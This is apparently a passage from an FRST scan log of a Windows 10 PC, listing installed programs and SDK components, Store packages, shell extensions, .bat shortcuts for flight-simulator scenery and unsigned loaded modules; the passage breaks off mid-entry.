SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - Krzysztof Kowalczyk) TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer) teVirtualMIDI64 (HKLM\...\{9084640A-366B-4C44-BDB1-74864B460B13}) (Version: 1.2.10.38 - Tobias Erichsen) Hidden thinkorswim (HKLM\...\9968-4488-2169-7623) (Version: desktop - thinkorswim, Inc) Traffic Simulator Configuration Tool (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Traffic Simulator Configuration Tool) (Version: - ) TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden UltraSearch V2.3 (64 bit) (HKLM\...\UltraSearch_is1) (Version: 2.3 - JAM Software) Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS) Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden 
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal CRT Extension SDK (HKLM-x32\...\{BE2D1829-B45D-4D78-BF02-4076B86AC57C}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden Universal CRT Headers Libraries and Sources (HKLM-x32\...\{A46D1F7A-BA32-2375-EF97-4975E594A7E7}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal CRT Redistributable (HKLM-x32\...\{413A1F9C-9349-4847-610E-BAB177A48ADE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden Universal General MIDI DLS Extension SDK (HKLM-x32\...\{E2EA2702-534B-D6C1-5AC4-724E3CE7B2D9}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden Universal Patch Finder version 1.5 (HKLM-x32\...\{88FBB3D2-C9A5-41E4-88B8-3F4F1722E7D1}_is1) (Version: 1.5 - Hypercube Softwares) Update for (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9C4F3AF4-21D8-43BD-A69C-517BB96012CF}) (Version: 2.12.0.0 - Microsoft Corporation) 
UpdateAssistant (HKLM-x32\...\{B302EECB-0DA5-46E6-8A58-127440F22CF1}) (Version: 1.7.0.0 - Microsoft Corporation) Hidden VBSBeautifier (remove only) (HKLM-x32\...\VBSBeautifier) (Version: - ) vcpp_crt.redist.clickonce (HKLM-x32\...\{253D6AD3-5786-4B3B-B4E1-E082482A1F26}) (Version: 14.16.27033 - Microsoft Corporation) Hidden VeraCrypt (HKLM-x32\...\VeraCrypt) (Version: 1.21 - IDRIX) Viber (HKLM-x32\...\{32AF88A9-E104-4306-8B68-CB92FFD2CAD6}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Hidden Viber (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\{9097b5b3-1f2b-4ff7-a350-97a76bb76fb8}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Visual Studio Community 2017 (HKLM-x32\...\fba7c5bd) (Version: 15.9.28307.905 - Microsoft Corporation) VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN) VoiceBot 3.0 (HKLM-x32\...\2BB5202A-885B-454F-8624-FD3310CD3225_is1) (Version: 3.0.0.0 - Binary Fortress Software) VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden vs_communitymsires 
(HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden Weka 3.8.3 (HKLM\...\Weka 3.8.3) (Version: 3.8.3 - Machine Learning Group, University of Waikato, Hamilton, NZ) WinAppDeploy (HKLM-x32\...\{03343DEA-224B-E9B6-1FBB-E637E6BC6BAA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinAutomation (HKLM\...\{67F5E390-8E09-4AE4-B7F2-705AFD23D86D}) (Version: 6.0.2.4227 - Softomotive Ltd) Hidden WinAutomation 
(HKLM-x32\...\WinAutomation) (Version: 6.0.2.4227 - Softomotive Ltd) Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22211 - Microsoft Corporation) Windows SDK AddOn (HKLM-x32\...\{E1C6F438-7C50-41F5-8B47-3CC96D397CA3}) (Version: 10.1.0.0 - Microsoft Corporation) Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - ) Windows Software Development Kit - Windows 10.0.15063.674 (HKLM-x32\...\{6824cee4-b358-4633-b82c-5f20894af8e2}) (Version: 10.1.15063.674 - Microsoft Corporation) Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation) WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH) WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D8AA52A2-81E2-BB84-AAF9-C487C586CC15}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{5715A2A6-E637-81E3-464D-3F0F999E506A}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense IoT - en-us (HKLM-x32\...\{2B8614A6-D0C1-CFE0-9311-7AF9227DC9BA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{409D68FF-37DD-F8F4-A60F-30BEAA4AA4CE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - 
Microsoft Corporation) Hidden WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense PPI - en-us (HKLM-x32\...\{3617F573-CF51-0F5A-063F-B272F98D0522}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{FDE59EF8-D43D-F9DA-5B0C-CC9C90DB0335}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense UAP - en-us (HKLM-x32\...\{87CC4887-0873-F87B-D804-6A78B07DC1F5}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{D62E0DD5-9853-C09C-AE15-D02988503C60}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden wxWidgets 3.0.4 (HKLM-x32\...\wxWidgets_is1) (Version: - wxWidgets) X-Mouse Button Control 2.18.8 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.18.8 - Highresolution Enterprises) ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic) Packages: ========= Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12228.20206.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> 
C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad] Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.33.13094.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) [MS Ad] Microsoft Phone Companion -> C:\Program Files\WindowsApps\Microsoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe [2018-11-13] (Microsoft Corporation) Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.11052.0_x64__8wekyb3d8bbwe [2019-11-10] (Microsoft Studios) [MS Ad] MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad] MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad] MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.33.13253.0_x64__8wekyb3d8bbwe [2019-11-23] (Microsoft Corporation) [MS Ad] Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) ==================== Custom CLSID (Whitelisted): ============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{23066764-9BDD-4FBD-8B1F-F4547CF2684F}\InprocServer32 -> C:\Users\SR\AppData\Local\Microsoft\OneDrive\18.070.0405.0002\amd64\FileSyncShell64.dll => No File CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\SR\Dropbox [2018-01-03 12:23] ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) 
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) 
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) 
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ContextMenuHandlers1: [AESCrypt] -> {35872D53-3BD4-45FA-8DB5-FFC47D4235E7} => C:\Program Files\AESCrypt\AESCrypt.dll [2015-04-17] (Packetizer, Inc.) [File not signed] ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> ) ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) 
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed] ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2017-01-31] (pdfforge GmbH -> pdfforge GmbH) ContextMenuHandlers1: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed] ContextMenuHandlers2: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) 
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed] ContextMenuHandlers4: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes (Christoph Guentner) -> Jumping Bytes) ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => -> No File ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> ) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal) ==================== Codecs (Whitelisted) ==================== ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) 
Shortcut: C:\Users\SR\Desktop\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxis\SimCity 4\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_AlpesNordBP.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_AlpesNordBP.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_SUMMER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_SUMMER.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_WINTER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_WINTER.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Summer.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_SummerBasePack.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Winter.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Summer.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_SummerBasePack.lnk -> D:\Dovetail Games - 
Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_SummerBasePack.bat () Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Winter.bat () ==================== Loaded Modules (Whitelisted) ============= 2019-11-24 19:12 - 2008-10-15 16:44 - 000205312 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\itdownload.dll 2019-11-24 19:12 - 2019-11-24 19:12 - 000903680 _____ () [File not signed] C:\Users\SR\AppData\Local\Temp\is-FML3U.tmp\Guitar.tmp 2009-02-23 12:28 - 2009-02-23 12:28 - 000013824 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctagent.DLL 2009-02-23 12:27 - 2009-02-23 12:27 - 000175104 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDCIFCE.DLL 2009-02-23 12:16 - 2009-02-23 12:16 - 000067584 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDPROXY.DLL 2009-02-23 12:28 - 2009-02-23 12:28 - 000061952 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctpcmcia.DLL 2009-02-23 